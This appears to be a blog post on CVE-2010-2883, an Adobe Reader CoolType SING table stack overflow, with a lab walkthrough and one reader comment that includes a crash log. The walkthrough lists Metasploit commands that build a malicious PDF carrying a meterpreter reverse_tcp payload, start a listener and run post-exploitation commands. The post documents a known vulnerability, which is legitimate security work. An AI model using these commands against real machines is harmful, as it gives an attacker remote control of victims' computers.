CVE-2010-2883 : Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow

Timeline :

Vulnerability exploited in the wild and discovered by Mila Parkour the 2010-09-06
Metasploit PoC provided the 2010-09-08

PoC provided by :

sn0wfl0w
vicheck
jduck

Reference(s) :

CVE-2010-2883
APSA10-02

Affected version(s) :

Adobe Reader 9.3.4 and previous versions for Windows, Macintosh and UNIX.
Adobe Acrobat 9.3.4 and previous versions for Windows and Macintosh.

Tested on Windows XP SP3 with :

Adobe Reader 9.3.4

Description :

This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version are assumed to be vulnerable as well.

Commands :

use exploit/windows/fileformat/adobe_cooltype_sing
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

One Reply to “CVE-2010-2883 : Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow”

  1. Hi,

    I think my computer has been attacked with this exploit because i have next event log in my Windows:

    Nombre de la aplicación con errores: firefox.exe versión: 1.9.2.4095 marca de tiempo: 0x4d852c95^`Nombre del módulo con errores: icucnv36.dll versión: 3.6.0.0 marca de tiempo: 0x470eff71^`Código de excepción: 0xc0000005^`Desplazamiento de errores: 0x0002a715^`Id. del proceso con errores: 0x708^`Hora de inicio de la aplicación con errores: 0x01cc72607c30096a^`Ruta de acceso de la aplicación con errores: C:\Program Files\Mozilla Firefox\firefox.exe^`Ruta de acceso del módulo con errores: C:\Program Files\Adobe\Reader 9.0\Reader\icucnv36.dll^`Id. del informe: ef27a56c-de56-11e0-bc54-000c29b8c4af

    How can i know what the attacker did? In other words, how can i know what command to run after the attacker exploit this vulnerability?

    Thanks.
    Regards.

Comments are closed.